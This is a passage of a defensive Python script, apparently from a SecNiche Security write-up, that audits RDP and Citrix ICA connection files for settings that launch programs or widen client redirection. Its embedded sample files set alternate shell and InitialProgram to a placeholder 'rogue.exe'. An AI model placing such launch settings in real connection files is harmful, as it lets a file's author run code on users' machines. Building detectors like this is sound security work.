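    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.read_string(text)
    return cp


def audit_ica(text):
    cp = parse_ica(text)
    findings = []
    for section in cp.sections():
        value = cp.get(section, "initialprogram", fallback="").strip()
        if not value:
            continue
        if value.startswith("#"):
            # '#Name' asks the server for a published application of that name;
            # the server decides what actually runs, so this is informational.
            findings.append(Finding("ica", section, "InitialProgram", value, "info",
                                    "published application requested by name"))
        else:
            findings.append(Finding("ica", section, "InitialProgram", value, "high",
                                    "command line run in the session instead of the desktop"))
    return findings


# Constructed samples (placeholder hosts and paths), one risky setting per kind.
SAMPLE_RDP = """\
screen mode id:i:1
full address:s:rds.example.test:3389
alternate shell:s: C:\\Tools\\rogue.exe
redirectdrives:i:1
redirectprinters:i:0
redirectsmartcards:i:1
username:s:freight
"""
SAMPLE_ICA = """\
[ApplicationServers]
Desktop=
Notepad=

[Desktop]
TransportDriver=TCP/IP
Address=citrix.example.test
InitialProgram=C:\\Tools\\rogue.exe

[Notepad]
Address=citrix.example.test
InitialProgram=#Notepad
"""


def report(label, findings):
    for f in findings:
        where = f"[{f.section}] " if f.section else ""
        print(f"{label}: {f.severity.upper():6} {where}{f.key} = {f.value!r}  ({f.reason})")


if __name__ == "__main__":
    if len(sys.argv) > 1:  # audit real files: *.ica / *.ini as INI, anything else as .rdp
        for path in sys.argv[1:]:
            text = open(path, encoding="utf-8-sig").read()
            audit = audit_ica if path.lower().endswith((".ica", ".ini")) else audit_rdp
            report(path, audit(text))
    else:
        report("sample.rdp", audit_rdp(SAMPLE_RDP))
        report("sample.ica", audit_ica(SAMPLE_ICA))
```

Run it with no arguments to see the findings for the embedded samples, or pass connection files on the command line. The severity split is deliberate: a raw InitialProgram or alternate shell value is something the file author chose, whereas a "#"-prefixed published application is resolved by the server, and redirection switches are not execution but widen what a hostile server can reach on the client.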


Demonstrations!




Questions




Thanks and Regards




SecNiche Security
                         http://www.secniche.org




